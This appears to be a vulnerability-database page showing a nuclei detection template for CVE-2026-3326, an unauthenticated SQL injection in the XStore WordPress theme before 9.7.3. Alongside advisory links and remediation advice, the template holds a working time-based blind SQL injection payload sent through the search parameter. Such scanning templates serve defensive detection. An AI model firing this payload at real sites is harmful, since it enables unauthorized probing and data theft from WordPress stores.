Lucene search
K

XStore Theme < 9.7.3 - SQL Injection

🗓️ 14 Jul 2026 07:07:24Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated SQL injection in XStore theme before 9.7.3 via AJAX; update to 9.7.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-3326
10 Jun 202610:51
circl
CNNVD
WordPress plugin Xstore SQL注入漏洞
10 Jun 202600:00
cnnvd
CVE
CVE-2026-3326
10 Jun 202606:00
cve
Cvelist
CVE-2026-3326 XStore < 9.7.3 - Unauthenticated SQLi
10 Jun 202606:00
cvelist
EUVD
EUVD-2026-35985
10 Jun 202606:00
euvd
NVD
CVE-2026-3326
10 Jun 202607:16
nvd
Patchstack
WordPress XStore theme < 9.7.3 - Unauthenticated SQLi vulnerability
11 Jun 202608:12
patchstack
Positive Technologies
PT-2026-48386
10 Jun 202600:00
ptsecurity
RedhatCVE
CVE-2026-3326
11 Jun 202608:59
redhatcve
Vulnrichment
CVE-2026-3326 XStore < 9.7.3 - Unauthenticated SQLi
10 Jun 202606:00
vulnrichment
Rows per page
id: CVE-2026-3326

info:
  name: XStore Theme < 9.7.3 - SQL Injection
  author: VixianSchool
  severity: high
  description: |
    The Xstore WordPress theme before 9.7.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can extract arbitrary data from the WordPress database, including credentials, session tokens, and WooCommerce customer records.
  remediation: |
    Update XStore theme to version 9.7.3 or later.
  reference:
    - https://wpscan.com/vulnerability/2c5bdb17-8b12-45b5-878b-627056dc8956/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3326
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-3326
    epss-score: 0.00282
    epss-percentile: 0.20066
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
  tags: cve,cve2026,wordpress,wp,wp-theme,sqli,xstore

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/xstore/style.css"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "XStore"
        internal: true

      - type: dsl
        dsl:
          - 'compare_versions(version, "< 9.7.3")'
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'Version:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 5'
          - 'status_code != 404'
        condition: and
# digest: 490a004630440220424cbc8e16213c3624f219da1108fdb12f3ca07b03bdb0189a45cd0e4b21066e022069c143a18648ce59f07e2634c50c58db02c3f34ff1d7d191aaf15940659839e7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2026 11:24Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.18.6
EPSS0.00282
SSVC
4